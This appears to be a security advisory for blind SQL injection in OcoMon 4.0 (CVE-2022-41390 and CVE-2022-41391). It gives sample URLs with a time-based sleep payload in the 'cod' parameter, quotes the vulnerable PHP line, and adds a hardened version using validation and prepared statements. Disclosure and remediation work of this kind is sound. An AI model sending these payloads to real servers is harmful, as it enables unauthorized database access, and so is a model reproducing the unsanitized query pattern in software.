Headline
CVE-2022-41391: OcoMon 4.0 - Blind SQL Injection
OcoMon v4.0 was discovered to contain a SQL injection vulnerability via the cod parameter at showImg.php.
Descriptions
During internal research I found two unauthenticated blind SQL injections in the OcoMon HelpDesk application.
Mitre Reference
CVE-2022-41390 and CVE-2022-41391.
Vulnerability
The vulnerability was exploited using the Burp Suite and sqlmap tools:
* Sample url: http://target:8000/ocomon-4.0RC1/includes/functions/download.php?file=3134&cod=(select*from(select(sleep(40))a)
* Sample url: http://target:8000/ocomon-4.0RC1/includes/functions/showImg.php?file=3134&cod=(select*from(select(sleep(40))a)
* Vulnerable parameters: cod
* Type: blind SQL injection
Short code description
The vulnerability happens because the code does not sanitize the 'cod' parameter, so its value reaches the SQL query unchanged and malicious SQL can be injected.
Example code:
if (isset($_GET['cod'])) {
    // 'cod' is concatenated into the SQL text without validation or escaping
    $query .= "WHERE dom_cod = ".$_GET['cod']."";
}
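A hardened counterpart to the snippet above, as an added example that is not OcoMon's code or the vendor's fix: it accepts cod only as an integer and passes it to the query as a bound parameter. The files table, the name column, the function names and the in-memory SQLite database are assumptions for illustration; only cod and dom_cod come from the advisory.

```php
<?php
// Added example, not OcoMon source. Table "files", column "name" and both
// function names are hypothetical; only 'cod' and dom_cod are from the advisory.

function parseCod(array $get): ?int
{
    // PHP turns cod[]=1 into an array, so require a string first
    if (!isset($get['cod']) || !is_string($get['cod'])) {
        return null;
    }
    // Accept only a positive integer; any SQL fragment fails this check
    $cod = filter_var($get['cod'], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $cod === false ? null : $cod;
}

function fetchByCod(PDO $pdo, int $cod): array
{
    // The value travels as a bound parameter, never as part of the SQL text
    $stmt = $pdo->prepare('SELECT dom_cod, name FROM files WHERE dom_cod = :cod');
    $stmt->bindValue(':cod', $cod, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed data in an in-memory SQLite database so the example runs offline
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE files (dom_cod INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO files VALUES (1, 'a.png'), (2, 'b.png')");

// Constructed requests: a valid id, the non-numeric value from the sample URLs,
// and an array-valued parameter
$requests = [
    ['cod' => '2'],
    ['cod' => '(select*from(select(sleep(40))a)'],
    ['cod' => ['2']],
];

foreach ($requests as $get) {
    $cod = parseCod($get);
    if ($cod === null) {
        // A real handler would answer HTTP 400 here and run no query at all
        echo 'rejected: ', json_encode($get['cod']), "\n";
        continue;
    }
    echo "rows for cod=$cod: ", json_encode(fetchByCod($pdo, $cod)), "\n";
}
```

The same two steps apply to both download.php and showImg.php, since both take cod from the query string.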
Vendor notification
https://ocomonphp.sourceforge.io/downloads/